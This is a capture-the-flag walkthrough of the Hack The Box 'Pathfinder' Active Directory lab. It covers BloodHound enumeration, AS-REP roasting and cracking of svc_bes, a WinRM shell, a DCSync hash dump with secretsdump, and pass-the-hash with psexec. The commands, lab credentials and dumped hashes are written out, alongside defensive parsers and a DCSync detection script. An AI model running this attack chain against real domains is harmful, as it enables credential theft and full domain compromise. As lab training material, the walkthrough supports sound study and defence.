HTB Starting Point – Pathfinder

 $./ennumeration.sh

[+] 10.10.10.30 scan started...

[-] Open ports : 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49676,49677,49683,49698,49720 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 22:39 CEST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.81% done; ETC: 22:41 (0:00:00 remaining)
Nmap scan report for 10.10.10.30
Host is up (0.042s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-22 03:42:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=5EC6E703%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m38s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-22T03:44:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.22 seconds
[+] 10.10.10.30 scan finished...

Open ports detected: 

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-23 23:54:30Z)

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default. 
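As an added example (not from the original post, and not the enumeration script it runs), the Python below parses nmap's normal output like the scan above and reduces it to the findings a reviewer would record: the port set that identifies a domain controller, the exposed remote-management endpoint, and the reported clock skew compared with Kerberos's default 5-minute tolerance. The input is a constructed subset of the scan output; the port-to-role tables are the standard AD service ports.

```python
import re

# Constructed sample: a subset of the nmap service lines and host-script
# results from the scan above (not the enumeration script's own code).
NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-22 03:42:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
Host script results:
|_clock-skew: 7h02m38s
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
SKEW_LINE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")
DOMAIN_RE = re.compile(r"Domain:\s*([^,\s)]+)")

# Ports that, seen together, identify a Windows domain controller.
DC_ROLE_PORTS = {88: "Kerberos KDC", 389: "LDAP", 636: "LDAPS",
                 3268: "Global Catalog", 3269: "Global Catalog (TLS)",
                 9389: "AD Web Services"}
REMOTE_ADMIN_PORTS = {5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)"}
KERBEROS_MAX_SKEW_SECONDS = 5 * 60  # Kerberos default clock tolerance

def parse_nmap(text):
    """Return ({port: (service, version)}, domain, skew_seconds) from nmap normal output."""
    open_ports, domain, skew = {}, None, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            if m.group(3) == "open":
                version = m.group(5) or ""
                open_ports[int(m.group(1))] = (m.group(4), version)
                dm = DOMAIN_RE.search(version)
                if dm and domain is None:
                    domain = dm.group(1)  # kept as nmap prints it, trailing "0." included
            continue
        s = SKEW_LINE.search(line)
        if s:
            sign, hours, mins, secs = s.groups()
            skew = int(hours or 0) * 3600 + int(mins or 0) * 60 + int(secs or 0)
            skew = -skew if sign == "-" else skew
    return open_ports, domain, skew

def assess(text):
    """Turn the parsed scan into the findings a reviewer would record."""
    open_ports, domain, skew = parse_nmap(text)
    findings = []
    dc_hits = sorted(p for p in open_ports if p in DC_ROLE_PORTS)
    if 88 in dc_hits and (389 in dc_hits or 3268 in dc_hits):
        roles = ", ".join(f"{p}/{DC_ROLE_PORTS[p]}" for p in dc_hits)
        findings.append(f"domain-controller: {roles}")
    for p in sorted(open_ports):
        if p in REMOTE_ADMIN_PORTS:
            findings.append(f"remote-admin: {p}/{REMOTE_ADMIN_PORTS[p]}")
    if skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS:
        findings.append(f"clock-skew: {skew}s exceeds Kerberos tolerance of "
                        f"{KERBEROS_MAX_SKEW_SECONDS}s; Kerberos clients must match the DC clock")
    return {"domain": domain, "open_ports": sorted(open_ports), "findings": findings}

if __name__ == "__main__":
    for key, value in assess(NMAP_OUTPUT).items():
        print(key, "=", value)
```

The clock-skew finding is worth keeping in the report: Kerberos rejects requests whose timestamp is more than five minutes off the KDC's clock, so a 7-hour offset between the scanning host and the DC explains time-related Kerberos failures and, on the DC side, shows up as KRB_AP_ERR_SKEW errors in the logs.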

Using the credentials obtained on a previous machine (sandra:Password1234!), we can attempt to enumerate Active Directory. We can do this with BloodHound, for which there is a Python ingestor (linked below).

BloodHound is a single page Javascript web application that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

https://github.com/fox-it/BloodHound.py

BloodHound.py is a Python-based ingestor for BloodHound, based on Impacket.

pip install bloodhound

/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/py2_warn.py:21: UserWarning: Setuptools will stop working on Python 2
************************************************************
You are running Setuptools on Python 2, which is no longer
supported and
>>> SETUPTOOLS WILL STOP WORKING <<<
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
https://bit.ly/setuptools-py2-warning.
************************************************************
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting bloodhound
  Downloading bloodhound-1.0.5-py2-none-any.whl (64 kB)
     |████████████████████████████████| 64 kB 1.8 MB/s
Collecting ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
  Downloading ldap3-2.7-py2.py3-none-any.whl (420 kB)
     |████████████████████████████████| 420 kB 8.2 MB/s
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.4.2)
Collecting dnspython
  Downloading dnspython-1.16.0-py2.py3-none-any.whl (188 kB)
     |████████████████████████████████| 188 kB 18.7 MB/s
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.9.20)
Requirement already satisfied: future in /usr/lib/python2.7/dist-packages (from bloodhound) (0.18.2)
Collecting ldapdomaindump>=0.9.0
  Downloading ldapdomaindump-0.9.2-py2-none-any.whl (21 kB)
ERROR: impacket 0.9.20 has requirement ldap3==2.5.1, but you'll have ldap3 2.7 which is incompatible.
Installing collected packages: ldap3, dnspython, bloodhound, ldapdomaindump
Successfully installed bloodhound-1.0.5 dnspython-1.16.0 ldap3-2.7 ldapdomaindump-0.9.2

Despite the ldap3 version conflict reported by pip, the ingestor runs against the domain controller with sandra's credentials:

$bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30

INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 08S

Installing and Starting BloodHound

Start the neo4j service and open its web console to complete the initial configuration:

$ neo4j console

http://localhost:7474

$ bloodhound --no-sandbox

Import the *.json files produced by the ingestor.

Useful built-in queries: Shortest Paths to High Value Targets and Find Principals with DCSync Rights.

We can see that svc_bes has the GetChangesAll right on the domain object.
GetChangesAll means that the user svc_bes can request replication data from the domain controller, including password secrets.

Lateral movement

Next, check whether Kerberos pre-authentication has been disabled for this account; if it has, the account is vulnerable to AS-REP Roasting.
We can check this with a tool such as Impacket's GetNPUsers.

Impacket install: download the repository and, from its root directory, run
$pip install .

$GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:8595b5809d50f5384d5d1258800b4560$bfec96893654506cf83359b8bd7bc6acb68221440f28c995f710d8a4bd99a83ef2c4b6b97d45026b7208f11b6ef4d7526cc1e581ad231d2066efba79b21e70b4ee9c29588512cd664113c1b510414c4271e623dae8b581d95ef0c333359266df1e373f866c798572f0b3ef5924f35d3b05516924af3d9b9f411f74180ab850ccebbcda27e339dcc1ef8e71a89ab0c1fefb84429c65eed176781b8f2f881ef0064dacba7e50040c4315deb4cd66986d7f895fee53c5931962ca6c2278c7498b28a86840c622ca16c4057035157b1e7e42063316ce86958a5c68c2a3343b9e6d801994d7295634bb2e97d9d70c5401903f

This is the AS-REP for the user svc_bes, the KDC reply that carries the Ticket Granting Ticket. Because pre-authentication is disabled it is handed out without proof of the password, and its encrypted part is keyed from the user's password, which is why it can be attacked offline.

Save this hash line to a new file.
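Added example, not from the original post and not part of Impacket or John: a parser for the $krb5asrep$ line format shown above, together with the check a defender runs to find which accounts carry the no-pre-auth flag. The hash sample is the svc_bes line from above with its encrypted part truncated; the userAccountControl values are constructed, since the page does not list them. The etype field is the part worth reading: 23 (RC4) means the encrypted part is keyed from the unsalted NT hash, which is what makes dictionary guessing against rockyou.txt practical, whereas the AES etypes (17, 18) use salted PBKDF2-derived keys.

```python
import re

# Kerberos encryption types as they appear in $krb5asrep$ lines and in
# secretsdump's "Kerberos keys" section, with how the key is derived.
ETYPES = {
    17: ("aes128-cts-hmac-sha1-96", "PBKDF2-HMAC-SHA1, salted, 4096 iterations"),
    18: ("aes256-cts-hmac-sha1-96", "PBKDF2-HMAC-SHA1, salted, 4096 iterations"),
    23: ("rc4-hmac", "unsalted NT hash (MD4 of the UTF-16LE password)"),
}

# userAccountControl bit set by "Do not require Kerberos preauthentication".
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Layout John uses for an RC4 (etype 23) AS-REP:
#   $krb5asrep$23$<user>@<REALM>:<checksum hex>$<enc-part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)

# Constructed sample: the svc_bes line from above with the enc-part truncated.
SAMPLE_HASH = (
    "$krb5asrep$23$svc_bes@MEGACORP.LOCAL:"
    "8595b5809d50f5384d5d1258800b4560$"
    "bfec96893654506cf83359b8bd7bc6acb68221440f28c995f710d8a4bd99a83e"
)

def parse_asrep_hash(line):
    """Split a $krb5asrep$ line into its fields and describe its key derivation."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line in the RC4 (etype 23) layout")
    etype = int(m.group("etype"))
    if etype not in ETYPES:
        raise ValueError(f"unknown etype {etype}")
    name, key_derivation = ETYPES[etype]
    return {
        "etype": etype,
        "etype_name": name,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": m.group("checksum").lower(),
        "enc_part_bytes": len(m.group("enc")) // 2,
        "key_derivation": key_derivation,
        "weak_etype": etype == 23,
    }

def accounts_with_preauth_disabled(uac_by_account):
    """Return accounts whose userAccountControl has the no-preauth bit set.

    uac_by_account maps sAMAccountName to the integer userAccountControl
    value, e.g. taken from an LDAP export of the domain's user objects.
    """
    return sorted(a for a, uac in uac_by_account.items() if uac & UF_DONT_REQUIRE_PREAUTH)

# Constructed sample userAccountControl values (the page does not list them;
# svc_bes is given the no-preauth bit to match what the walkthrough found).
SAMPLE_UAC = {
    "Administrator": 0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "sandra": 0x200,            # NORMAL_ACCOUNT
    "svc_bes": 0x400200,        # NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH
}

if __name__ == "__main__":
    info = parse_asrep_hash(SAMPLE_HASH)
    print(f"{info['user']}@{info['realm']}: etype {info['etype']} ({info['etype_name']}), "
          f"key = {info['key_derivation']}")
    print("pre-auth disabled:", accounts_with_preauth_disabled(SAMPLE_UAC))
```

For every account the second function reports, the fix is to clear that bit (re-enable Kerberos pre-authentication); where a legacy client genuinely needs it, the account's password should be long and random so that the AS-REP does not yield to a wordlist.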

$vim svc_bes.hash

Use John the Ripper to obtain the password from the hash.

$john svc_bes.hash -wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:09 DONE (2020-05-24 12:46) 0.1049g/s 1112Kp/s 1112Kc/s 1112KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have obtained svc_bes's credentials (username: svc_bes; password: Sheffield19).

We can then use WinRM (port 5985, found open during enumeration) to log in with the svc_bes credentials.

https://github.com/diyan/pywinrm
(if you want to use it in your python scripts)

https://github.com/Hackplayers/evil-winrm
(stand-alone WinRM shell)

 $sudo gem install evil-winrm

 $evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir

    Directory: C:\Users\svc_bes\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fXXXXXXXXXXXXXXXXXXXXXXXXXXXX
*Evil-WinRM* PS C:\Users\svc_bes\Desktop>

Privilege escalation

To leverage the GetChangesAll permission, we can use Impacket’s secretsdump.py to perform a DCSync attack and dump the NTLM hashes of all domain users.

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of a Domain Controller (DC) in order to retrieve password data via domain replication. Once an attacker has access to a privileged account with domain replication rights, the attacker can use the replication protocols to mimic a domain controller.

https://blog.stealthbits.com/what-is-dcsync-an-introduction/
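The GetChangesAll edge BloodHound showed for svc_bes is the same right a DCSync request exercises, so the defender's counterpart to the Find Principals with DCSync Rights query is twofold: review who holds the replication rights on the domain object, and alert when a principal that is not a domain controller actually uses them. Windows records that use as Security event 4662 (when "Audit Directory Service Access" is enabled and the domain object carries a SACL). The detection below is an added example, not part of the original walkthrough nor of Impacket or BloodHound; the event records are constructed, and the three GUIDs are the published extended-right GUIDs for the replication rights.

```python
import re

# Control-access right GUIDs on the domain object that replication requests
# exercise; BloodHound's "GetChangesAll" edge corresponds to the second one.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is used

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample of Security-log events flattened to the fields a SIEM
# would index (the GUID in the third event is an arbitrary non-replication value).
SAMPLE_EVENTS = [
    {   # routine replication by the DC's own machine account
        "EventID": 4662, "SubjectDomainName": "MEGACORP", "SubjectUserName": "PATHFINDER$",
        "ObjectType": "domainDNS", "AccessMask": "0x100",
        "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account exercising the same rights, as a DRSUAPI dump would produce
        "EventID": 4662, "SubjectDomainName": "MEGACORP", "SubjectUserName": "svc_bes",
        "ObjectType": "domainDNS", "AccessMask": "0x100",
        "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # unrelated directory access on a user object: no replication GUID
        "EventID": 4662, "SubjectDomainName": "MEGACORP", "SubjectUserName": "sandra",
        "ObjectType": "user", "AccessMask": "0x20",
        "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {"EventID": 4624, "SubjectDomainName": "MEGACORP", "SubjectUserName": "sandra"},
]

def detect_dcsync(events, dc_accounts, allowlist=()):
    """Flag 4662 events in which a non-DC principal used a replication right.

    dc_accounts: machine accounts of the legitimate domain controllers, e.g. {"PATHFINDER$"}.
    allowlist: service accounts expected to replicate (e.g. an Azure AD Connect account).
    """
    expected = {a.lower() for a in dc_accounts} | {a.lower() for a in allowlist}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0x0"), 16) & ADS_RIGHT_DS_CONTROL_ACCESS == 0:
            continue
        used = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))} & REPLICATION_GUIDS
        if not used:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in expected:
            continue
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": sorted(used),
            "full_replication": DS_REPLICATION_GET_CHANGES_ALL in used,
        })
    return alerts

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, dc_accounts={"PATHFINDER$"}):
        print("DCSync-style replication by", alert["subject"], alert["rights"])
```

The allowlist is the part that needs care in a real environment: directory-sync products do hold these rights legitimately, so the rule should name those accounts explicitly rather than suppressing every service account, and the list of DC machine accounts should come from the directory (the Domain Controllers OU) rather than being typed in by hand.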

NT LAN Manager (NTLM) is the Microsoft authentication protocol that was created to be the successor of LM.

http://techgenix.com/how-cracked-windows-password-part1/

$secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:174b5eb9a4d332fa875cdf74bdae989a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:8ad500da727e5eb0936cd31810b58404e64545d268039c3794768f3d3839b3ad
PATHFINDER$:aes128-cts-hmac-sha1-96:f0b3b715b15cf4e546bc40c66b00b482
PATHFINDER$:des-cbc-md5:708567e980a7a285
[*] Cleaning up...

Using the NTLM hash of the built-in domain Administrator account, we can perform a pass-the-hash (PtH) attack to gain elevated access to the system.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. 

https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack

We can use Impacket's psexec.py. Its -hashes option takes LMHASH:NTHASH only, so the RID and the trailing ":::" fields of the secretsdump line must be dropped. The first form below is the raw secretsdump line and is rejected; the second is the form that works:

psexec.py megacorp.local/administrator@10.10.10.30 -hashes 500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

 $psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
